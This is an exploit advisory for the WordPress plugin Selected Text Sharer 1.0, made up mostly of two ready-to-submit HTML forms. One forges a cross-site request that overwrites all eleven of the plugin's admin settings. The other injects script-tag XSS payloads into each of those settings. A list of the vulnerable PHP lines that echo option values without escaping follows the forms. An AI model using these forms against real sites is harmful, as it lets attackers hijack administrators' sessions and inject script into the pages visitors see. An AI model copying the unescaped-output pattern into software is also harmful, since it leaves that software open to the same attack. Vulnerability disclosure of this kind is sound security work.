WordPress Selected Text Sharer 1.0 CSRF / XSS
Posted on 07 August 2016
==================== [+] Exploit Title : WP Selected Text Sharer CSRF/XSS [+] Exploit Author :bl4ck_mohajem [+] Date : 2015/09/24 [+] Version : 1.0 [+] Tested on : Elementary Os [+] Vendor Homepage : http://www.aakashweb.com/wordpress-plugins/wp-selected-text-sharer/ ============================================================================= [+] Exploit CSRF : <form method="post" action="http://localhost/wp-admin/options-general.php?page=wp-selected-text-sharer%2Fwp-selected-text-sharer.php"> <input name="wpsts_title" type="hidden" value='CSRF 1'> <input name="wpsts_lists" type="hidden" value='CSRF 2'> <input name="wpsts_borderColor" type="hidden" value='CSRF 3'> <input name="wpsts_bgColor" type="hidden" value='CSRF 4'> <input name="wpsts_titleColor" type="hidden" value='CSRF 5'> <input name="wpsts_hoverColor" type="hidden" value='CSRF 6'> <input name="wpsts_textColor" type="hidden" value='CSRF 7'> <input name="wpsts_extraClass" type="hidden" value='CSRF 8'> <input name="wpsts_truncateChars" type="hidden" value='CSRF 9'> <input name="wpsts_element" type="hidden" value='CSRF 10'> <input name="wpsts_bitly" type="hidden" value='CSRF 11'> <input type="submit" name="wpsts_submit" value="Update"> </form> ============================================================================= [+] Exploit XSS : <form method="post" action="http://localhost/wp-admin/options-general.php?page=wp-selected-text-sharer%2Fwp-selected-text-sharer.php"> <input name="wpsts_title" type="hidden" value='"><script>alert(/XSS 1/)</script>'> <input name="wpsts_lists" type="hidden" value='</textarea><script>alert(/XSS 2/)</script>'> <input name="wpsts_borderColor" type="hidden" value='"><script>alert(/XSS 3/)</script>'> <input name="wpsts_bgColor" type="hidden" value='"><script>alert(/XSS 4/)</script>'> <input name="wpsts_titleColor" type="hidden" value='"><script>alert(/XSS 5/)</script>'> <input name="wpsts_hoverColor" type="hidden" value='"><script>alert(/XSS 6/)</script>'> <input name="wpsts_textColor" type="hidden" value='"><script>alert(/XSS 7/)</script>'> <input name="wpsts_extraClass" type="hidden" value='"><script>alert(/XSS 8/)</script>'> <input name="wpsts_truncateChars" type="hidden" value='"><script>alert(/XSS 9/)</script>'> <input name="wpsts_element" type="hidden" value='"><script>alert(/XSS 10/)</script>'> <input name="wpsts_bitly" type="hidden" value='"><script>alert(/XSS 11/)</script>'> <input type="submit" name="wpsts_submit" value="Update"> </form> ============================================================================= [+] Vulnerable Code : 372:<input name="wpsts_title" id="wpsts_title" type="text" value="<?php echo $wpsts_title; ?>"/> 388:<textarea name="wpsts_lists" id="wpsts_lists"><?php echo $wpsts_lists; ?></textarea> 403:<input name="wpsts_borderColor" id="wpsts_borderColor" class="color" type="text" value="<?php echo $wpsts_borderColor; ?>"/> 407:<input name="wpsts_bgColor" id="wpsts_bgColor" class="color" type="text" value="<?php echo $wpsts_bgColor; ?>"/> 411:<input name="wpsts_titleColor" id="wpsts_titleColor" class="color" type="text" value="<?php echo $wpsts_titleColor; ?>"/> 415:<input name="wpsts_hoverColor" id="wpsts_hoverColor" class="color" type="text" value="<?php echo $wpsts_hoverColor; ?>"/> 419:<input name="wpsts_textColor" id="wpsts_textColor" class="color" type="text" value="<?php echo $wpsts_textColor; ?>"/> 423:<input name="wpsts_extraClass" type="text" value="<?php echo $wpsts_extraClass; ?>"/> 448:<input name="wpsts_truncateChars" type="text" value="<?php echo $wpsts_truncateChars; ?>"/> 454:<input name="wpsts_element" type="text" value="<?php echo $wpsts_element; ?>"/> 458:<input name="wpsts_bitly" type="text" value="<?php echo $wpsts_bitly; ?>" size="40"/> ================= ###############################################3 tnx: ehsan cod3r - Milad hacking - n1arash - malah sky - bl4ck_li0n ###########################################
